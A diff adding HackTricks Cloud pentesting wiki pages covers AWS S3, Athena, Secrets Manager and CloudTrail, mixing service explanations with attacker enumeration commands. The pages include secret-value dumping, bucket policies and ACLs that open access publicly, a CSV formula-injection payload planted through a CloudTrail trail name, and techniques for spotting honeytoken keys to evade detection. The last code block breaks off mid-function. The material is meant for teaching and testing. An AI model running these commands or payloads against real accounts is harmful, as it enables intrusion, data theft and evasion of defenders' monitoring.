+Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case.
+
+With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
+
+### Bucket Versioning and MFA based delete
+
+When bucket versioning is enabled, any action that tries to alter a file inside a file will generate a new version of the file, keeping also the previous content of the same. Therefore, it won't overwrite its content.
+
+Moreover, MFA based delete will prevent versions of file in the S3 bucket from being deleted and also Bucket Versioning from being disabled, so an attacker won't be able to alter these files.
+
+### S3 Access logs
+
+It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region).
+
+### S3 Presigned URLs
+
+It's possible to generate a presigned URL that can usually be used to **access the specified file** in the bucket. A **presigned URL looks like this**:
+
+```
+https://<bucket-name>.s3.us-east-1.amazonaws.com/asd.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAUUE8GZC4S5L3TY3P%2F20230227%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230227T142551Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjELf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBhQpdETJO3HKKDk2hjNIrPWwBE8gZaQccZFV3kCpPCWAiEAid3ueDtFFU%2FOQfUpvxYTGO%2BHoS4SWDMUrQAE0pIaB40qggMIYBAAGgwzMTgxNDIxMzg1NTMiDJLI5t7gr2EGxG1Y5CrfAioW0foHIQ074y4gvk0c%2B%2Fmqc7cNWb1njQslQkeePHkseJ3owzc%2FCwkgE0EuZTd4mw0aJciA2XIbJRCLPWTb%2FCBKPnIMJ5aBzIiA2ltsiUNQTTUxYmEgXZoJ6rFYgcodnmWW0Et4Xw59UlHnCDB2bLImxPprriyCzDDCD6nLyp3J8pFF1S8h3ZTJE7XguA8joMs4%2B2B1%2FeOZfuxXKyXPYSKQOOSbQiHUQc%2BFnOfwxleRL16prWk1t7TamvHR%2Bt3UgMn5QWzB3p8FgWwpJ6GjHLkYMJZ379tkimL1tJ7o%2BIod%2FMYrS7LDCifP9d%2FuYOhKWGhaakPuJKJh9fl%2B0vGl7kmApXigROxEWon6ms75laXebltsWwKcKuYca%2BUWu4jVJx%2BWUfI4ofoaGiCSaKALTqwu4QNBRT%2BMoK6h%2BQa7gN7JFGg322lkxRY53x27WMbUE4unn5EmI54T4dWt1%2Bg8ljDS%2BvKfBjqmAWRwuqyfwXa5YC3xxttOr3YVvR6%2BaXpzWtvNJQNnb6v0uI3%2BTtTexZkJpLQYqFcgZLQSxsXWSnf988qvASCIUhAzp2UnS1uqy7QjtD5T73zksYN2aesll7rvB80qIuujG6NOdHnRJ2M5%2FKXXNo1Yd15MtzPuSjRoSB9RSMon5jFu31OrQnA9eCUoawxbB0nHqwK8a43CKBZHhA8RoUAJW%2B48EuFsp3U%3D&X-Amz-Signature=3436e4139e84dbcf5e2e6086c0ebc92f4e1e9332b6fda24697bc339acbf2cdfa
+```
+
+A presigned URL can be **created from the cli using credentials of a principal with access to the object** (if the account you use doesn't have access, a shorter presigned URL will be created but it will be useless)
+
+```bash
+ aws s3 presign --region <bucket-region> 's3://<bucket-name>/<file-name>'
+```
+
+{% hint style="info" %}
+The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject`
+{% endhint %}
+
+It's also possible to create presigned URLs with **other permissions**:
+
+```python
+import boto3
+url = boto3.client('s3').generate_presigned_url(
+    ClientMethod='put_object', 
+    Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'},
+    ExpiresIn=3600
+)
+```
+
+### S3 Encryption Mechanisms
+
+**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
+
+<details>
+
+<summary><strong>Server-side encryption with S3 managed keys, SSE-S3</strong></summary>
+
+This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key.
+
+* Encryption:
+  * Object Data + created plaintext DEK --> Encrypted data (stored inside S3)
+  * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory
+* Decryption:
+  * Encrypted DEK + S3 Master Key --> Plaintext DEK
+  * Plaintext DEK + Encrypted data --> Object Data
+
+Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control.
+
+</details>
+
+<details>
+
+<summary><strong>Server-side encryption with KMS managed keys, SSE-KMS</strong></summary>
+
+This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail.
+
+* Encryption:
+  * S3 request data keys from KMS CMK
+  * KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£
+  * S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key
+* Decryption:
+  * S3 ask to KMS to decrypt the encrypted data key of the object
+  * KMS decrypt the data key with the CMK and send it back to S3
+  * S3 decrypts the object data
+
+</details>
+
+<details>
+
+<summary><strong>Server-side encryption with customer provided keys, SSE-C</strong></summary>
+
+This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you.
+
+* Encryption:
+  * The user sends the object data + Customer key to S3
+  * The customer key is used to encrypt the data and the encrypted data is stored
+  * a salted HMAC value of the customer key is stored also for future key validation
+  * the customer key is deleted from memory
+* Decryption:
+  * The user send the customer key
+  * The key is validated against the HMAC value stored
+  * The customer provided key is then used to decrypt the data
+
+</details>
+
+<details>
+
+<summary><strong>Client-side encryption with KMS, CSE-KMS</strong></summary>
+
+Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored.
+
+* Encryption:
+  * Client request for a data key to KMS
+  * KMS returns the plaintext DEK and the encrypted DEK with the CMK
+  * Both keys are sent back
+  * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3)
+* Decryption:
+  * The encrypted data with the encrypted DEK is sent to the client
+  * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK
+  * The client can now decrypt the encrypted data
+
+</details>
+
+<details>
+
+<summary><strong>Client-side encryption with customer provided keys, CSE-C</strong></summary>
+
+Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage.
+
+* Encryption:
+  * The client generates a DEK and encrypts the plaintext data
+  * Then, using it's own custom CMK it encrypts the DEK
+  * submit the encrypted data + encrypted DEK to S3 where it's stored
+* Decryption:
+  * S3 sends the encrypted data and DEK
+  * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
+
+</details>
+
+### **Enumeration**
+
+One of the traditional main ways of compromising AWS orgs start by compromising buckets publicly accesible. **You can find** [**public buckets enumerators in this page**](../aws-unauthenticated-enum-access/#s3-buckets)**.**
+
+```bash
+# Get buckets ACLs
+aws s3api get-bucket-acl --bucket <bucket-name>
+aws s3api get-object-acl --bucket <bucket-name> --key flag
+
+# Get policy
+aws s3api get-bucket-policy --bucket <bucket-name>
+aws s3api get-bucket-policy-status --bucket <bucket-name> #if it's public
+
+# list S3 buckets associated with a profile
+aws s3 ls
+aws s3api list-buckets
+
+# list content of bucket (no creds)
+aws s3 ls s3://bucket-name --no-sign-request
+aws s3 ls s3://bucket-name --recursive
+
+# list content of bucket (with creds)
+aws s3 ls s3://bucket-name
+aws s3api list-objects-v2 --bucket <bucket-name>
+aws s3api list-objects --bucket <bucket-name>
+aws s3api list-object-versions --bucket <bucket-name>
+
+# copy local folder to S3
+aws s3 cp MyFolder s3://bucket-name --recursive
+
+# delete
+aws s3 rb s3://bucket-name –-force
+
+# download a whole S3 bucket
+aws s3 sync s3://<bucket>/ .
+
+# move S3 bucket to different location
+aws s3 sync s3://oldbucket s3://newbucket --source-region us-west-1
+
+# list the sizes of an S3 bucket and its contents
+aws s3api list-objects --bucket BUCKETNAME --output json --query "[sum(Contents[].Size), length(Contents[])]"
+
+# Update Bucket policy
+aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>
+##JSON policy example
+{
+  "Id": "Policy1568185116930",
+  "Version": "2012-10-17",
+  "Statement": [
+  {
+      "Sid": "Stmt1568184932403",
+      "Action": [
+        "s3:ListBucket"
+      ],
+      "Effect": "Allow",
+      "Resource": "arn:aws:s3:::welcome",
+      "Principal": "*"
+  },
+  {
+    "Sid": "Stmt1568185007451",
+    "Action": [
+      "s3:GetObject"
+    ],
+    "Effect": "Allow",
+    "Resource": "arn:aws:s3:::welcome/*",
+    "Principal": "*"
+  }
+  ]
+}
+
+# Update bucket ACL
+aws s3api get-bucket-acl --bucket <bucket-name> # Way 1 to get the ACL
+aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json
+
+aws s3api get-object-acl --bucket <bucket-name> --key flag #Way 2 to get the ACL
+aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json
+
+##JSON ACL example
+## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
+{
+  "Owner": {
+    "DisplayName": "<DisplayName>",
+    "ID": "<ID>"
+  },
+  "Grants": [
+  {
+    "Grantee": {
+      "Type": "Group",
+      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+    },
+  "Permission": "FULL_CONTROL"
+  }
+  ]
+}
+## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
+```
+
+### dual-stack <a href="#dual-stack-endpoints-description" id="dual-stack-endpoints-description"></a>
+
+You can access an S3 bucket through a dual-stack endpoint by using a virtual hosted-style or a path-style endpoint name. These are useful to access S3 through IPv6.
+
+Dual-stack endpoints use the following syntax:
+
+* `bucketname.s3.dualstack.aws-region.amazonaws.com`
+* `s3.dualstack.aws-region.amazonaws.com/bucketname`
+
+### Privesc
+
+In the following page you can check how to **abuse S3 permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-s3-privesc.md" %}
+[aws-s3-privesc.md](../aws-privilege-escalation/aws-s3-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md" %}
+[aws-s3-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### S3 Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-s3-post-exploitation.md" %}
+[aws-s3-post-exploitation.md](../aws-post-exploitation/aws-s3-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-s3-persistence.md" %}
+[aws-s3-persistence.md](../aws-persistence/aws-s3-persistence.md)
+{% endcontent-ref %}
+
+## Other S3 vulns
+
+### S3 HTTP Cache Poisoning Issue <a href="#heading-s3-http-desync-cache-poisoning-issue" id="heading-s3-http-desync-cache-poisoning-issue"></a>
+
+[**According to this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) it was possible to cache the response of an arbitrary bucket as if it belonged to a different one. This could have been abused to change for example javascript file responses and compromise arbitrary pages using S3 to store static code.
+
+## Amazon Athena
+
+Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
+
+You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it.
+
+Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**.
+
+**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**.
+
+SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
+
+### Enumeration
+
+```bash
+# Get catalogs
+aws athena list-data-catalogs
+
+# Get databases inside catalog
+aws athena list-databases --catalog-name <catalog-name>
+aws athena list-table-metadata --catalog-name <catalog-name> --database-name <db-name>
+
+# Get query executions, queries and results
+aws athena list-query-executions
+aws athena get-query-execution --query-execution-id <id> # Get query and meta of results
+aws athena get-query-results --query-execution-id <id> # This will rerun the query and get the results
+
+# Get workgroups & Prepared statements
+aws athena list-work-groups
+aws athena list-prepared-statements --work-group <wg-name>
+aws athena get-prepared-statement --statement-name <name> --work-group <wg-name>
+
+# Run query
+aws athena start-query-execution --query-string <query>
+```
+
+## References
+
+* [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3)
+* [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
new file mode 100644
index 0000000000..95d71ffd10
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
@@ -0,0 +1,76 @@
+# AWS - Secrets Manager Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS Secrets Manager
+
+AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications.
+
+The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions.
+
+The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies.
+
+For granting access to secrets to a user from a different AWS account, it's necessary to:
+
+1. Authorize the user to access the secret.
+2. Grant permission to the user to decrypt the secret using KMS.
+3. Modify the Key policy to allow the external user to utilize it.
+
+**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
+
+### **Enumeration**
+
+```bash
+aws secretsmanager list-secrets #Get metadata of all secrets
+aws secretsmanager list-secret-version-ids --secret-id <secret_name> # Get versions
+aws secretsmanager describe-secret --secret-id <secret_name> # Get metadata
+aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
+aws secretsmanager get-secret-value --secret-id <secret_name> --version-id <version-id> # Get value of a different version
+aws secretsmanager get-resource-policy --secret-id --secret-id <secret_name>
+```
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-secrets-manager-privesc.md" %}
+[aws-secrets-manager-privesc.md](../aws-privilege-escalation/aws-secrets-manager-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-secrets-manager-post-exploitation.md" %}
+[aws-secrets-manager-post-exploitation.md](../aws-post-exploitation/aws-secrets-manager-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-secrets-manager-persistence.md" %}
+[aws-secrets-manager-persistence.md](../aws-persistence/aws-secrets-manager-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
new file mode 100644
index 0000000000..0416f90ff9
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
@@ -0,0 +1,2 @@
+# AWS - Security & Detection Services
+
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
new file mode 100644
index 0000000000..4d18615341
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
@@ -0,0 +1,330 @@
+# AWS - CloudTrail Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## **CloudTrail**
+
+AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.
+
+Each logged event contains:
+
+* The name of the called API: `eventName`
+* The called service: `eventSource`
+* The time: `eventTime`
+* The IP address: `SourceIPAddress`
+* The agent method: `userAgent`. Examples:
+  * Signing.amazonaws.com - From AWS Management Console
+  * console.amazonaws.com - Root user of the account
+  * lambda.amazonaws.com - AWS Lambda
+* The request parameters: `requestParameters`
+* The response elements: `responseElements`
+
+Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\
+CloudTrails logs can be **aggregated across accounts and across regions.**\
+CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\
+When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.
+
+Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.
+
+The logs are stored in a **S3 bucket with this name format**:
+
+* **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`**
+* Being the BucketName: **`aws-cloudtrail-logs-<accountid>-<random>`**
+* Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`**
+
+Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`**
+
+Log File Naming Convention
+
+![](<../../../../.gitbook/assets/image (122).png>)
+
+Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in:
+
+![](<../../../../.gitbook/assets/image (195).png>)
+
+### Aggregate Logs from Multiple Accounts
+
+* Create a Trial in the AWS account where you want the log files to be delivered to
+* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
+* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1
+
+However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account.
+
+{% hint style="danger" %}
+Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets.
+{% endhint %}
+
+### Cloudtrail from all org accounts into 1
+
+When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket:
+
+<figure><img src="../../../../.gitbook/assets/image (200).png" alt=""><figcaption></figcaption></figure>
+
+This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).
+
+### Log Files Checking
+
+You can check that the logs haven't been altered by running
+
+{% code overflow="wrap" %}
+```javascript
+aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
+```
+{% endcode %}
+
+### Logs to CloudWatch
+
+**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
+Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
+
+* CreateLogStream: This allows to create a CloudWatch Logs log streams
+* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
+
+### Event History
+
+CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
+
+![](<../../../../.gitbook/assets/image (89).png>)
+
+### Insights
+
+**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
+
+The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
+
+### Security
+
+| CloudTrail Log File Integrity        | <ul><li>Validate if logs have been tampered with (modified or deleted)</li><li><p>Uses digest files (create hash for each file)</p><ul><li>SHA-256 hashing</li><li>SHA-256 with RSA for digital signing</li><li>private key owned by Amazon</li></ul></li><li>Takes 1 hour to create a digest file (done on the hour every hour)</li></ul> |
+| ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
+| Stop unauthorized access             | <ul><li><p>Use IAM policies and S3 bucket policies</p><ul><li>security team —> admin access</li><li>auditors —> read only access</li></ul></li><li>Use SSE-S3/SSE-KMS to encrypt the logs</li></ul>                                                                                                                                        |
+| Prevent log files from being deleted | <ul><li>Restrict delete access with IAM and bucket policies</li><li>Configure S3 MFA delete</li><li>Validate with Log File Validation</li></ul>                                                                                                                                                                                            |
+
+## Access Advisor
+
+AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.
+
+{% hint style="success" %}
+Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them
+{% endhint %}
+
+<figure><img src="../../../../.gitbook/assets/image (78).png" alt=""><figcaption></figcaption></figure>
+
+## Actions
+
+### Enumeration
+
+```bash
+# Get trails info
+aws cloudtrail list-trails
+aws cloudtrail describe-trails
+aws cloudtrail list-public-keys
+aws cloudtrail get-event-selectors --trail-name <trail_name>
+aws [--region us-east-1] cloudtrail get-trail-status --name [default]
+
+# Get insights
+aws cloudtrail get-insight-selectors --trail-name <trail_name>
+
+# Get data store info
+aws cloudtrail list-event-data-stores
+aws cloudtrail list-queries --event-data-store <data-source>
+aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>
+```
+
+### **CSV Injection**
+
+It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\
+The following code will generate log entry with a bad Trail name containing the payload:
+
+```python
+import boto3
+payload = "=cmd|'/C calc'|''"
+client = boto3.client('cloudtrail')
+response = client.create_trail(
+	Name=payload,
+	S3BucketName="random"
+)
+print(response)
+```
+
+For more information about CSV Injections check the page:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/formula-injection" %}
+
+For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/)
+
+## **Bypass Detection**
+
+### HoneyTokens **bypass**
+
+Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key.
+
+However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**.
+
+[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**
+
+* If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message.
+  * Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name.
+* If **`SpaceCrab`** appears in the role name in the error message
+* **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
+* If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken.
+
+#### Get the account ID from the Key ID
+
+You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of Honeytokens AWS accounts:
+
+```python
+import base64
+import binascii
+
+def AWSAccount_from_AWSKeyID(AWSKeyID):
+    
+    trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
+    x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
+    y = x[0:6]
+    
